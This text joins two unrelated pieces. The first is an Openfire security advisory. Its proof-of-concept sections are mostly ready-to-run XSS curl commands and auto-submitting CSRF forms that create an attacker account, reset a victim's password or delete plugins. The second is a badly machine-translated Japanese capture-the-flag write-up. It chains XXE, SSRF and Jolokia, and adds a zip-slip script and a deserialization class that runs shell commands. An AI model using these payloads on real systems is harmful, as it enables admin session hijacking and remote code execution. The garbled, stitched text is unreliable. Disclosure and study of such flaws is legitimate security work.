You can reproduce the exploitation with the following curl commands:
```
curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&remotePort=5269&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
curl --data "domain=test&remotePort=5269%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverAllowed=Add+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
curl --data "domain=%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverBlocked=Block+Server" https://OpenFireServerIP:9090/server2server-settings.jsp --cookie="JSESSIONID=XXX"
```
#### *criteria* variable from *plugins/search/advance-user-search.jsp*
The following GET request exploits the XSS vulnerability:
```
http://OpenFireServerIP:9090/[[http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search
```
## Several stored XSS Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user.
### Proof of Concept
#### *mucdesc* variable from *muc-service-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/muc-service-edit-form.jsp" >
<input type="text" name="save" value="true" >
<input type="text" name="mucname" value="test" >
<input type="text" name="mucdesc" value="%22/><script>alert('XSS')</script>" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "save=true&mucname=test&mucdesc=test%22%2F%3E%3Cscript%3Ealert%28%27XSS-2%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp?save" method="post" target="xss-frame" >
<input type="text" name="searchEnabled" value="true" >
<input type="text" name="searchname" value="search%22/><script>alert('XSS')</script>" >
<input type="text" name="groupOnly" value="false" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl "http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp" --data="searchEnabled=true&searchname=%22/%3E%3Cscript%3Ealert('XSS')%3C/script%3E&groupOnly=false" --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *page plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="xss-frame" >
<input type="text" name="propValue" value="=adminConsole.port" >
<input type="text" name="searchname" value="9090%22 onmouseover=%22alert('XSS')%22 x="/>
<input type="text" name="encrypt" value="false" >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "searchEnabled=true&searchname=search%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupOnly=false" https://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *serverName* variable from *plugins/search/search-props-edit-form.jsp*
The following POST values can be sent to trigger the vulnerability:
```
serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties
```
The following code allows the creation of a web frame exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-props.jsp" method="post" target="xss-frame" >
<input type="text" name="serverName" value="localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" >
<input type="text" name="serverPort" value="5269" >
<input type="text" name="componentPort" value="5275" >
<input type="text" name="port" value="5222" >
<input type="text" name="sslEnabled" value="true" >
<input type="text" name="sslPort" value="5223" >
<input type="text" name="embeddedPort" value="9090" >
<input type="text" name="embeddedSecurePort" value="9091" >
<input type="text" name="jmxEnabled" value="false" >
<input type="text" name="jmxSecure" value="true" >
<input type="text" name="jmxPort" value="1099" >
<input type="text" name="save" value="Save+Properties" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
or with this curl command:
```
curl --data "serverName=localhost.localdomain%22%2F%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&serverPort=5269&componentPort=5275&port=5222&sslEnabled=true&sslPort=5223&embeddedPort=9090&embeddedSecurePort=9091&jmxEnabled=false&jmxSecure=true&jmxPort=1099&save=Save+Properties" https://OpenFireServerIP:9090/server-props.jsp --cookie="JSESSIONID=XXX"
```
### Affected versions
* Version >= 3.10.2 and < 4.0.0
## Several Relected XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.2
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Reflected XSS could lead to session hijacking against an administrator.
Some of these vulnerabilities have already been found by hyp3rlinx, but had not been patched properly.
### Proof of Concept
#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from *page create-bookmark.jsp* suffer from the vulnerability
The following POST values can be sent to trigger the vulnerability:
```
groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS1%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS2%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat
```
The following curl command allows reproducing the attack against the Openfire *plugins/bookmarks/create-bookmark.jsp* page:
```
curl --data "save=true&mucname=conference&mucdesc=Public+Chatrooms%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E" https://OpenFireServerIP:9090/muc-service-edit-form.jsp --cookie="JSESSIONID=XXX"
```
#### *search* variable from *group-summary.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22
```
The following curl command allows reproducing the attack against the Openfire *group-summary.jsp* page.
```
curl http://OpenFireServerIP:9090/group-summary.jsp?search=test%22+onmouseover%3Dalert%28%27XSS%27%29+x%3D%22 --cookie="JSESSIONID=XXX"
```
#### *maxTotalSize*, *maxFileSize*, *maxDays*, *logTimeout* variables from *audit-policy.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings
```
The following curl command allows reproducing the attack against the Openfire *audit-policy.jsp* page:
```
curl "http://OpenFireServerIP:9090/audit-policy.jsp?auditEnabled=false&logDir=%2Fopt%2Fopenfire%2Flogs&maxTotalSize=1000%22%3E%3Cscript%3Ealert%28%27XSS3%27%29%3C%2Fscript%3E&maxFileSize=10%22%3E%3Cscript%3Ealert%28%27XSS4%27%29%3C%2Fscript%3E&maxDays=-1%22%3E%3Cscript%3Ealert%28%27XSS5%27%29%3C%2Fscript%3E&logTimeout=120%22%3E%3Cscript%3Ealert%28%27XSS6%27%29%3C%2Fscript%3E&ignore=&update=Save+Settings" --cookie="JSESSIONID=XXX"
```
#### *passPhrase* variables from *import-keystore-certificate.jsp*
The following POST values exploit the XSS vulnerability:
```
passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save
```
The following curl command allows reproducing the attack against the Openfire *import-keystore-certificate.jsp* page.
```
curl http://OpenFireServerIP:9090/import-keystore-certificate.jsp --data="passPhrase=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&privateKey=test&certificate=test&save=Save" --cookie="JSESSIONID=XXX"
```
#### *criteria* variable from */plugins/search/advance-user-search.jsp*
The following GET request exploit the XSS vulnerability:
```
http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search
```
The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* admin page.
```
curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX"
```
### Affected versions
* Version 4.0.0 and 4.0.1
## Several stored XSS Vulnerabilities identified in Openfire 4.0.0 and 4.0.1
Some of these vulnerabilities have already been found by hyp3rlinx, but has not been patched since.
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-79
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several XSS vulnerabilities have been found on several pages of the administration panel. Stored XSS could lead to session hijacking on admin user.
### Proof of Concept
#### *subdomain* variable from *connection-settings-external-components.jsp*
The following curl command allows reproducing the attack against the Openfire *connection-settings-external-components.jsp* page:
```
curl --data "subdomain=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&secret=toto&componentAllowed=Add+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX"
```
Or
```
curl --data "subdomain=%22%3Escript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&componentBlocked=Block+Component" https://OpenFireServerIP:9090/connection-settings-external-components.jsp --cookie="JSESSIONID=XXX"
```
#### *mucdesc* variable from *muc-service-edit-form.jsp*
The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page:
```
curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX"
```
#### *groupchatName*, *groupchatJID*, *users* and *groups* variables from page muc-service-edit-form.jsp
The following curl command allows reproducing the attack against the Openfire *muc-service-edit-form.jsp* page:
```
curl --data "groupchatName=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groupchatJID=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%C2%B2&users=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&groups=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&createGroupchatBookmark=Create&type=groupchat" https://OpenFireServerIP:9090/plugins/bookmarks/create-bookmark.jsp --cookie="JSESSIONID=XXX"
```
#### *searchname* variable from *plugins/search/search-props-edit-form.jsp*
The following curl command allows reproducing the attack against the Openfire *plugins/search/advance-user-search.jsp* page:
```
curl "http://OpenFireServerIP:9090/plugins/search/advance-user-search.jsp?search=true&moreOptions=false&criteria=admin%22/%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E&search=Search" --cookie="JSESSIONID=XXX"
```
The folling code allows exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/plugins/search/search-props-edit-form.jsp?save" method="post" target="xss-frame" >
<input type="text" name="searchEnabled" value="true" >
<input type="text" name="searchname" value="search%22/><script>alert('XSS')</script>" >
<input type="text" name="groupOnly" value="false" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
#### *propValue* variable from *server-properties.jsp*
The following curl command allows reproducing the attack against the Openfire *server-properties.jsp* page:
```
curl --data="propName=adminConsole.port&propValue=9090%22+onmouseover%3D%22alert%28%27xxs%27%29%22+x%3D%22&encrypt=false&save=Save+Property" http://OpenFireServerIP:9090/server-properties.jsp --cookie="JSESSIONID=XXX"
```
The folling code allows exploiting the vulnerability:
```
<iframe style="display:none" name="xss-frame"></iframe>
<form id="xss-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="xss-frame" >
<input type="text" name="propValue" value="=adminConsole.port" >
<input type="text" name="searchname" value="9090%22 onmouseover=%22alert('XSS')%22 x="/>
<input type="text" name="encrypt" value="false" >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("xss-form").submit()</script>
```
###Affected versions
* Version 4.0.0 and 4.0.1
## Several CSRF Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-312
**CVSS Base Score**: 5.4
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Throught this attack an attacker could drive a valid user to execute unwittingly a request on the OpenFire sever.
### Proof of Concept
#### *connection-settings-external-components.jsp* page is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/dwr/exec/downloader.installPlugin.dwr" method="post" target="csrf-frame" >
<input type="text" name="callCount" value="1" >
<input type="text" name="c0-scriptName" value="downloader" >
<input type="text" name="c0-methodName" value="installPlugin" >
<input type="text" name="c0-id" value="9033_1444939787005" >
<input type="text" name="c0-param0" value="string:http://www.igniterealtime.org/projects/openfire/plugins/broadcast.jar" >
<input type="text" name="c0-param1" value="string:8221154" >
<input type="text" name="xml" value="true" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *client-connections-settings.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/client-connections-settings.jsp" method="post" target="csrf-frame" >
<input type="text" name="port" value="5222" >
<input type="text" name="sslEnabled" value="false" >
<input type="text" name="sslPort" value="5223" >
<input type="text" name="idleDisco" value="true" >
<input type="text" name="clientIdle" value="360" >
<input type="text" name="pingIdleClients" value="true" >
<input type="text" name="update" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *manage-updates.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the *Openfire manage-updates.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/manage-updates.jsp" method="post" target="csrf-frame" >
<input type="text" name="serviceEnabled" value="false" >
<input type="text" name="notificationsEnabled" value="false" >
<input type="text" name="proxyEnabled" value="true" >
<input type="text" name="proxyHost" value="10.0.0.1" >
<input type="text" name="proxyPort" value="6666" >
<input type="text" name="update" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *plugin-admin.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *plugin-admin.jsp* page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/plugin-admin.jsp" method="get" target="csrf-frame" >
<input type="text" name="deleteplugin" value="broadcast" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
The following HTML iframe command allows reproducing the attack against the Openfire *reg-settings.jsp* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/reg-settings.jsp" method="get" target="csrf-frame" >
<input type="text" name="inbandEnabled" value="false" >
<input type="text" name="canChangePassword" value="false" >
<input type="text" name="anonLogin" value="fasle" >
<input type="text" name="allowedIPs" value="0.0.0.0" >
<input type="text" name="allowedAnonymIPs" value="0.0.0.0" >
<input type="text" name="save" value="Save Settings" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *server-properties.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *server-properties.jsp* admin page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/server-properties.jsp" method="post" target="csrf-frame" >
<input type="text" name="propName" value="test" >
<input type="text" name="propValue" value="test" >
<input type="text" name="encrypt" value=""false >
<input type="text" name="save" value="Save Property" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *system-email.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *system-email.jsp* admin page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/system-email.jsp" method="post" target="csrf-frame" >
<input type="text" name="host" value="mail.google.com" >
<input type="text" name="port" value="25" >
<input type="text" name="debug" value="false" >
<input type="text" name="server_username" value="toto" >
<input type="text" name="server_password" value="toto" >
<input type="text" name="save" value="Save Changes" >
</form>
```
### Affected versions
* Version >= 3.10.2 and < 4.0.0
## Several CSRF Vulnerabilities identified in Openfire 3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-312
**CVSS Base Score**: 5.4
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N/E:F/RL:O
### Vulnerability Description
Several CSRF vulnerabilities have been found on different pages of the admin panel of the OpenFire web server. Through this attack, an attacker could drive a valid user to execute unwittingly a request to the OpenFire sever.
These vulnerabilities have already been found by hyp3rlinx, but had not been patched yet.
### Proof of Concept
#### *connection-settings-external-components.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *dwr/exec/downloader.installPlugin.dwr* page:
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/user-create.jsp" method="get" target="csrf-frame" >
<input type="text" name="name" value="Evil" >
<input type="text" name="email" value="evil@evil.f" >
<input type="text" name="password" value="evil" >
<input type="text" name="passwordConfirm" value="evil" >
<input type="text" name="create" value="Create+User" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
#### *client-connections-settings.jsp* is vulerable to a CSRF attack.
The following HTML iframe command allows reproducing the attack against the Openfire *client-connections-settings.jsp* page.
```
<iframe style="display:none" name="csrf-frame"></iframe>
<form id="csrf-form" action="http://OpenFireServerIP:9090/user-password.jsp" method="post" target="csrf-frame" >
<input type="text" name="username" value="victim" >
<input type="text" name="password" value="evil" >
<input type="text" name="passwordConfirm" value="evil" >
<input type="text" name="update" value="Update+Password" >
</form>
<script>document.getElementById("csrf-form").submit()</script>
```
### Affected versions
* Version 4.0.0 and 4.0.1
## Sensitive information disclosure in OpenFire Server <=3.10.2
**Access Vector**: remote
**Security Risk**: low
**Vulnerability**: CWE-200
**CVSS Base Score**: 5.5
[comment]: https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N/E:F/RL:O
### Vulnerability Description
A sensitive information disclosure vulnerabilty is present in the page *system-email.jsp*. It allow's an authenticated user to retreive the md5 hash the password of an email account.
### Vulnerable code
The following HTML code is reveived by an authenticated user on the page system-email.jsp. The md5 hash of the password is sent to the user.
```
<tr>
<td nowrap>
Server Username (Optional):
</td>
<td nowrap>
<input type="text" name="server_username" value="myusername" size="40" maxlength="150">
</td>
</tr>
<tr>
<td nowrap>
Server Password (Optional):
</td>
<td nowrap>
<input type="password" name="server_password" value="34819d7beeabb9260a5c854bc85b3e44" size="40" maxlength="150">
</td>
</tr>
```
### Affected versions
* Version >=3.10.2 and <4.0.2
### Fixes
* https://github.com/igniterealtime/Openfire/pull/570
### Solution
Update to version 4.0.2
### Timeline (dd/mm/yyyy)
* 15/10/2014 : Initial discovery
* 19/10/2015 : Contact with vendor team
* 27/11/2014 : vendor fixes vulnerabilities
* 27/11/2014 : vendor releases version 4.0.2, which includes the fixes
## Credits
* Florian Nivette <f.nivette@sysdream.com>
-- SYSDREAM Labs <labs@sysdream.com> GPG : 47D1 E124 C43E F992 2A2E 1551 8EB4 8CD9 D5B2 59A1 * Website: https://sysdream.com/ * Twitter: @sysdream
web
x1ct34m_api_system
著者:wh1sper
タイトル説明:
APIセキュリティの新しい時代では、セキュリティサークルは変更を拡大しています。
あなたは巨大な波を作っていますか?あなたは空を覆うあなたの手を持っていますか?以前のパートナーを保護または放棄することを選択しますか?
Target:http://129.211.173.64:582/
添付のリンク:
https://wwn.lanzoui.com/iuodwwyfdxc
hint1:
バイパス403への隠されたAPI
hint2:
Jolokia Readfile
テストポイント:スプリングブートアクチュエータの不適切な構成によって引き起こされるAPIセキュリティの問題
アクチュエーター /マッピングにアクセスすることにより、 /アクチュエーター /ジョロキア(ローカルIPの制限、直接アクセス返品403)と非表示のAPIインターフェイス /ユーザー /リストがあることがわかります。
または、Apikitを直接使用して /user /list:
postアクセス /ユーザー /リスト、XML形式のデータを返します
とても当然、私はxxeについて考えました。 WAFを追加し、ファイルを直接読み取ることを許可しませんでした。
(ここには予期せぬことをした2人のマスターがいます。XXEのWAFはうまく書かれていませんでした。そのため、テイクアウトフラグを盲目的に呼び出すことができます。ターゲットマシンがネットワークから出ないように制限し、テイクアウトできませんでした。)
しかし、私たち全員が知っているように、XXEはSSRFになる可能性があります。
その後、SSRFは /アクチュエータ /ジョロキアと一緒に使用できます。 Dockerプロキシのポートであるため、ローカルサービスポートを取得するには、最初にアクセス /アクチュエーター /envが必要です。
その後、SSRFを構築します。
/jolokia /listによって返されるデータは長すぎるため、内部のいくつかの特別なシンボルはXMLドキュメント構造が同じエンティティ内で開始および終了する必要があると報告しています。
それで、私は後で添付ファイルを与えたので、私は地元で起動して、どのMBeanがそこにあるかを見ることができます。
には、ファイルを読み書きできるMbeanがあります。
com.sun.management:type=diagnosticcommand
このMbeanがリモート環境に存在するかどうかを判断します。
NOがある場合、返された画像は上記の写真です。いいえがある場合、返された画像は次の2つの状況です
Exp:
投稿/ユーザー/リストhttp/1.1
host: localhost:8080
user-agent: mozilla/5.0(windows nt 10.0; win64; x64; rv336094.0)gecko/20100101 firefox/94.0
Accept: Text/HTML、Application/XHTML+XML、Application/XML; Q=0.9、Image/Avif、Image/Webp、*/*; Q=0.8
Connection:閉じます
Cookie: jSessionId=4E8E18623EC2DEB1675E56DF895D33B
Content-Type:アプリケーション/XML
Content-Length: 194
?xmlバージョン='1.0'?
!doctype dy [
!エンティティDYシステム 'http://127.0.0.1:8080/Actuator/Jolokia/Exec/com.sun.management3:Type=DiagnosticCommand/CompilerDirectiveSadd/!/!/flag'
]
Iddy;/idcopyflag:
nctf {spring_actuator_and_jolokia_1s_so_fun_by_the_way_we1com3_to_join_api_security_community_yulige_yyds_wysb}
ezjava
質問者ID:pupi1
タイトル説明:
Dai教授は、2日間のファイル管理システムを開設しました。それが完成する前に、彼はハッカーに取り去られ、その中に何かを隠しました。
http://129.211.173.64:8080/html/index.html
http://129.211.173.64:8081/html/index.html
添付のリンク:
リンク:https://pan.baidu.com/s/1jb6kcy478ashrtxefjp1bq
抽出コード:NCTF
https://wwn.lanzoui.com/iamsdwyi0pe
https://ATTACHMENT.H4CK.FUN:9000/web/ezjava/nctf.war
flag3360
nctf {j3va_securlt9_ls_t0o_dlfficult}この質問は、JSPをサポートして任意のファイルを書き込むことをサポートしないRCE使用率です
前の部分では、最初にコードを監査します。 zipをアップロードしてから、減圧で見つけることができます。
圧縮されたパッケージファイルのファイルを確認しないため、解凍されたディレクトリの交差点につながる可能性があります。ここで、スクリプトを介してそのようなzipを生成できます。
zipfileをインポートします
OSをインポートします
__name__=='__main __' :の場合
try:
zipfile=zipfile.zipfile( 'poc.zip'、 'a'、zipfile.zip_deflated)
info=zipfile.zipinfo( 'poc.zip')
zipfile.write( 'poc.class'、 '././usr/local/tomcat/webapps/html/web-inf/classs/com/x1c/nctf/poc.class'、zipfile.zip_deflated)
zipfile.close()
e:としてのioerrorを除く
エコピーを上げると、私たちは今ではあらゆるファイルに書き込むのと同じくらい良いです。したがって、Spring Bootが実行されているときにRCEを取り除く方法の問題であり、ホット展開なしでJSPをサポートしていない(再起動プロセス中にJSPサポートが開かれているようですX___X)
実際、ここでは脱介入のためにバックドアが与えられています。ここのプロンプトは実際には非常に明白です。 ClassPathに悪意のあるクラスファイルを書くことができます。 Deserializationを通じて悪意のあるクラスにReadobjectメソッドをロードし、RCEを達成する方法。
質問によって与えられた添付ファイルは戦争であり、クラスパスを簡単に取得し、悪意のあるクラスをクラスパスに解凍し、バックドアの脱色を通してそれをトリガーするためのTomcatへの道もあります。 (Tomcatパスはデフォルトであり、パスをzipルートで確認できるため、Tomcatパスは最初にここに与えられませんでした。ただし、解決策がない場合は、ヒントを使用してマスターを促します:)
Exp:
パッケージcom.x1c.nctf;
java.io.*をインポートします。
java.io.serializableをインポートします。
com.x1c.nctf.tool。*;
パブリッククラスPOCはシリアル化可能な実装{
public poc(){
}
private void writeObject(objectInputStream out)IoException、classNotFoundException {
out.defaultreadobject();
}
private void readObject(objectInputStream in)IOException、classNotFoundException {
in.defaultreadobject();
runtime.getRuntime()。exec( 'touch /tmp/1.txt');
}
public static void main(string [] args)スロー例外{
poc o=new poc();
system.out.println(tool.base64encode(tool.serialize(o)));
}
}
backdoor?cmd=ro0abxnyabbjb20uedfjlm5jdgyuug9jltxeychkw8gcaab4ca==コピーシェルをリバウンドするだけです!
prettyjs
質問者ID:BYC_404
タイトル説明:
エクスプレステンプレートを提供する役に立たないウェブサイト…
link:https://prettyjs.bycsec404.top
添付のリンク:
リンク:https://pan.baidu.com/s/174wsqkqh08l-utnipr0uva
抽出コード:1TXC
https://ATTACHMENT.H4CK.FUN:9000/web/prettyjs/prettyjs.zip
https://nctf.slight-wind.com/web/prettyjs/prettyjs.zip
flag3360
nctf {eany_get_me_a_job_to_study_on_javascript:)}この質問の主な目的は、XSSのない /API /テンプレートの下でプレイヤーがXSを使用して機密情報を取得しない方法を調べることです。ただし、問題を展開する際の私の過失により、/API/テンプレートのデフォルトのコンテンツタイプはText/HTMLです。 csrf=xss orzを直接実行できます。ここのコンテンツタイプはテキスト/プレーンである必要があると予想されます。
これが予想されるアイデアプロセスです:
コードを監査した後、Cookieを構築する必要があり、Cookieに必要なadmin_usernameとcookie_secretは、 /api /テンプレートルートのadmin botのテンプレートコンテンツに由来することがわかります。
ただし、理論的には、サイトにはXSがないため、出発点は次のとおりです。ボットに独自のサーバーにアクセスし、トピックWebサイトにクロスドメインリクエストを行うことができます。
クロスドメインには、SOP(同じ起源ポリシー)の制限が必要です。タイトルのCookie Samesite属性は誰にも設定されていないため、Cookieはサーバーのドメインでまだ有効になりますが、Fetch、xmlhttprequest、その他の手段を介してSOPによって制限されます。リクエストは送信されますが、返信はJavaScriptが返された後に取得されません。
同時に、サーバー上の参照チェックもあります。
ここでの参照チェックは、実際には多くの主流のWebサービス/ミドルウェアがJSONP、ビデオアドレス、その他のインターフェイスの参照者をチェックする手段です。参照ヘッダーがある場合は、それが当社からあるかどうかを判断します。ただし、このような検査方法をバイパスするのは非常に簡単です。参照者を持参しないでください。
したがって、重要なのは、ドメイン間でロードして戻り値を取得することです。 JSをドメイン間でロードするときにSOPによってスクリプトが制限されないことを知っています。また、その返品コンテンツも制御範囲内にあることがわかっています。しかし、ここでスクリプトで解決する必要がある2つの問題があります
/API/テンプレートコンテンツは、JS/API/テンプレートだけではありません。それはポストルートです。これら2つの問題を順番に解決します。
